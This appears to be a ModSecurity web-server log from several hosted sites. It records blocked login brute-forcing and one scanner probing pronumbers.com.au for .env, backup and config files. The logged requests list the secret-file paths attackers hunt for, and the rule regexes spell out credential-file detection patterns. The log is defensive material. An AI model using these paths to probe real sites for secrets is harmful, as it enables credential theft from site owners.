[Tue May 26 19:52:33.009191 2026] [security2:error] [pid 86490:tid 86504] [remote 208.109.188.137:52668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.188.109.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWsqFZMwN0DpLVWo6KfoQAAyA0"], referer: https://bloggertarget.com/wp-login.php
[Tue May 26 19:52:33.228561 2026] [security2:error] [pid 86490:tid 86723] [client 185.177.72.53:12338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/.env"] [unique_id "ahWsqVZMwN0DpLVWo6KfsAAAAOw"]
[Tue May 26 19:52:33.456492 2026] [security2:error] [pid 86490:tid 86652] [client 45.154.98.38:65431] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.98.154.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/xmlrpc.php"] [unique_id "ahWsqVZMwN0DpLVWo6KftwAAAKU"]
[Tue May 26 19:52:33.456660 2026] [security2:error] [pid 86490:tid 86652] [client 45.154.98.38:65431] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "koneksi.com.co"] [uri "/xmlrpc.php"] [unique_id "ahWsqVZMwN0DpLVWo6KftwAAAKU"]
[Tue May 26 19:52:33.726613 2026] [security2:error] [pid 86490:tid 86660] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsqVZMwN0DpLVWo6KfswAAAK0"]
[Tue May 26 19:52:35.171065 2026] [security2:error] [pid 86490:tid 86668] [client 185.177.72.53:12894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/portfolio-app/backend/.env"] [unique_id "ahWsq1ZMwN0DpLVWo6Kf6QAAALU"]
[Tue May 26 19:52:35.627735 2026] [security2:error] [pid 86490:tid 86628] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsq1ZMwN0DpLVWo6Kf7AAAAI0"]
[Tue May 26 19:52:36.466386 2026] [security2:error] [pid 86490:tid 86726] [client 185.177.72.53:12894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.production.backup"] [unique_id "ahWsrFZMwN0DpLVWo6KgGgAAAO8"]
[Tue May 26 19:52:36.894519 2026] [security2:error] [pid 86490:tid 86658] [client 185.177.72.53:12894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/administrator/config.copy"] [unique_id "ahWsrFZMwN0DpLVWo6KgIAAAAKs"]
[Tue May 26 19:52:37.217201 2026] [security2:error] [pid 86490:tid 86681] [client 185.177.72.53:12894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/zmusic-frontend/.env"] [unique_id "ahWsrVZMwN0DpLVWo6KgOAAAAMI"]
[Tue May 26 19:52:37.865224 2026] [security2:error] [pid 86490:tid 86690] [client 185.177.72.53:12894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admins/.env.bak"] [unique_id "ahWsrVZMwN0DpLVWo6KgRwAAAMs"]
[Tue May 26 19:52:37.890680 2026] [security2:error] [pid 86490:tid 86583] [remote 18.190.7.192:57316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWsrVZMwN0DpLVWo6KgRQAAplw"]
[Tue May 26 19:52:38.188891 2026] [security2:error] [pid 86490:tid 86705] [client 185.177.72.53:12894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mobile-app/api/.env"] [unique_id "ahWsrlZMwN0DpLVWo6KgUAAAANo"]
[Tue May 26 19:52:38.223418 2026] [security2:error] [pid 86490:tid 86574] [remote 18.190.7.192:57316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWsrlZMwN0DpLVWo6KgTwAAylM"], referer: https://anujtradingco.com/wp-login.php
[Tue May 26 19:52:38.348768 2026] [security2:error] [pid 86490:tid 86727] [client 185.177.72.53:12894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/uat/.env"] [unique_id "ahWsrlZMwN0DpLVWo6KgXQAAAPA"]
[Tue May 26 19:52:38.973039 2026] [security2:error] [pid 86490:tid 86647] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsrlZMwN0DpLVWo6KgZwAAAKA"]
[Tue May 26 19:52:39.809427 2026] [security2:error] [pid 86490:tid 86701] [client 185.177.72.53:12894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.uat.backup"] [unique_id "ahWsr1ZMwN0DpLVWo6KgiAAAANY"]
[Tue May 26 19:52:40.780666 2026] [security2:error] [pid 86490:tid 86740] [client 185.177.72.53:12894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admin.php.copy"] [unique_id "ahWssFZMwN0DpLVWo6KgpgAAAP0"]
[Tue May 26 19:52:40.873107 2026] [security2:error] [pid 86490:tid 86735] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWssFZMwN0DpLVWo6KgoAAAAPg"]
[Tue May 26 19:52:41.425499 2026] [security2:error] [pid 86490:tid 86715] [client 185.177.72.53:12894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/social-app/frontend/.env"] [unique_id "ahWssVZMwN0DpLVWo6KgwQAAAOQ"]
[Tue May 26 19:52:41.445068 2026] [security2:error] [pid 86490:tid 86695] [client 106.222.225.197:30628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 197.225.222.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rsmsi.org.in"] [uri "/xmlrpc.php"] [unique_id "ahWssVZMwN0DpLVWo6KguQAAANA"]
[Tue May 26 19:52:41.445335 2026] [security2:error] [pid 86490:tid 86695] [client 106.222.225.197:30628] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "rsmsi.org.in"] [uri "/xmlrpc.php"] [unique_id "ahWssVZMwN0DpLVWo6KguQAAANA"]
[Tue May 26 19:52:42.558880 2026] [security2:error] [pid 86490:tid 86714] [client 185.177.72.53:12894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mssql.php.bak"] [unique_id "ahWsslZMwN0DpLVWo6Kg4AAAAOM"]
[Tue May 26 19:52:42.881053 2026] [security2:error] [pid 86490:tid 86691] [client 185.177.72.53:12894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/uploads/.env"] [unique_id "ahWsslZMwN0DpLVWo6Kg7gAAAMw"]
[Tue May 26 19:52:43.202229 2026] [security2:error] [pid 86490:tid 86738] [client 185.177.72.53:12894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/app/config/.env"] [unique_id "ahWss1ZMwN0DpLVWo6Kg-QAAAPs"]
[Tue May 26 19:52:43.773127 2026] [security2:error] [pid 86490:tid 86569] [remote 213.171.208.232:44388] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWss1ZMwN0DpLVWo6KhAwAAvk4"]
[Tue May 26 19:52:44.008668 2026] [security2:error] [pid 86490:tid 86634] [client 185.177.72.53:12894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/development/.env.bak"] [unique_id "ahWstFZMwN0DpLVWo6KhFQAAAJM"]
[Tue May 26 19:52:44.163478 2026] [security2:error] [pid 86490:tid 86650] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWss1ZMwN0DpLVWo6KhDQAAAKM"]
[Tue May 26 19:52:44.169615 2026] [security2:error] [pid 86490:tid 86638] [client 185.177.72.53:12894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/keys/sample.bak"] [unique_id "ahWstFZMwN0DpLVWo6KhGQAAAJc"]
[Tue May 26 19:52:44.492757 2026] [security2:error] [pid 86490:tid 86693] [client 185.177.72.53:12894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/example27-how-to-load-env/sample02/.env"] [unique_id "ahWstFZMwN0DpLVWo6KhKAAAAM4"]
[Tue May 26 19:52:44.652256 2026] [security2:error] [pid 86490:tid 86662] [client 185.177.72.53:12894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/fe/.env"] [unique_id "ahWstFZMwN0DpLVWo6KhLwAAAK8"]
[Tue May 26 19:52:45.622768 2026] [security2:error] [pid 86490:tid 86664] [client 185.177.72.53:12894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/secure/.env"] [unique_id "ahWstVZMwN0DpLVWo6KhVgAAALE"]
[Tue May 26 19:52:46.106532 2026] [security2:error] [pid 86490:tid 86710] [client 185.177.72.53:12894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/app/frontend/.env"] [unique_id "ahWstlZMwN0DpLVWo6KhYgAAAN8"]
[Tue May 26 19:52:46.197273 2026] [security2:error] [pid 86490:tid 86524] [remote 178.104.164.71:39192] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahWstlZMwN0DpLVWo6KhYwAA6iE"]
[Tue May 26 19:52:46.670343 2026] [security2:error] [pid 86490:tid 86620] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWstlZMwN0DpLVWo6KhZgAAAIU"]
[Tue May 26 19:52:46.719042 2026] [security2:error] [pid 86490:tid 86667] [client 62.60.130.228:63810] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWstlZMwN0DpLVWo6KhcwAAALQ"]
[Tue May 26 19:52:47.045407 2026] [security2:error] [pid 86490:tid 86641] [client 62.60.130.228:62182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWst1ZMwN0DpLVWo6KhhgAAAJo"], referer: https://www.google.com/search?q=wordpress
[Tue May 26 19:52:47.101334 2026] [security2:error] [pid 86490:tid 86669] [client 185.177.72.53:16418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/chat-client/.env"] [unique_id "ahWst1ZMwN0DpLVWo6KhhwAAALY"]
[Tue May 26 19:52:47.438470 2026] [security2:error] [pid 86490:tid 86642] [client 185.177.72.53:16418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/data/debug.bak"] [unique_id "ahWst1ZMwN0DpLVWo6KhkgAAAJs"]
[Tue May 26 19:52:47.605422 2026] [security2:error] [pid 86490:tid 86740] [client 185.177.72.53:16418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/symfony/.env"] [unique_id "ahWst1ZMwN0DpLVWo6KhmgAAAP0"]
[Tue May 26 19:52:47.945186 2026] [security2:error] [pid 86490:tid 86743] [client 185.177.72.53:16418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/sql/wp-config.bak"] [unique_id "ahWst1ZMwN0DpLVWo6KhogAAAQA"]
[Tue May 26 19:52:48.787260 2026] [security2:error] [pid 86490:tid 86641] [client 185.177.72.53:16418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/delivery-app/frontend/.env"] [unique_id "ahWsuFZMwN0DpLVWo6KhugAAAJo"]
[Tue May 26 19:52:48.961576 2026] [security2:error] [pid 86490:tid 86739] [client 185.177.72.53:16418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/zone/.env"] [unique_id "ahWsuFZMwN0DpLVWo6KhygAAAPw"]
[Tue May 26 19:52:49.129311 2026] [security2:error] [pid 86490:tid 86688] [client 185.177.72.53:16418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/voucher/.env"] [unique_id "ahWsuVZMwN0DpLVWo6KhzwAAAMk"]
[Tue May 26 19:52:49.297477 2026] [security2:error] [pid 86490:tid 86680] [client 185.177.72.53:16418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/token.swp"] [unique_id "ahWsuVZMwN0DpLVWo6Kh0AAAAME"]
[Tue May 26 19:52:49.421223 2026] [security2:error] [pid 86490:tid 86738] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsuVZMwN0DpLVWo6KhzQAAAPs"]
[Tue May 26 19:52:49.566824 2026] [security2:error] [pid 86490:tid 86672] [client 114.119.158.156:25455] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "worldwidecourier.co.in"] [uri "/2023/04/30/"] [unique_id "ahWsuVZMwN0DpLVWo6Kh2wAAALk"], referer: https://worldwidecourier.co.in/category/uncategorized/page/2/
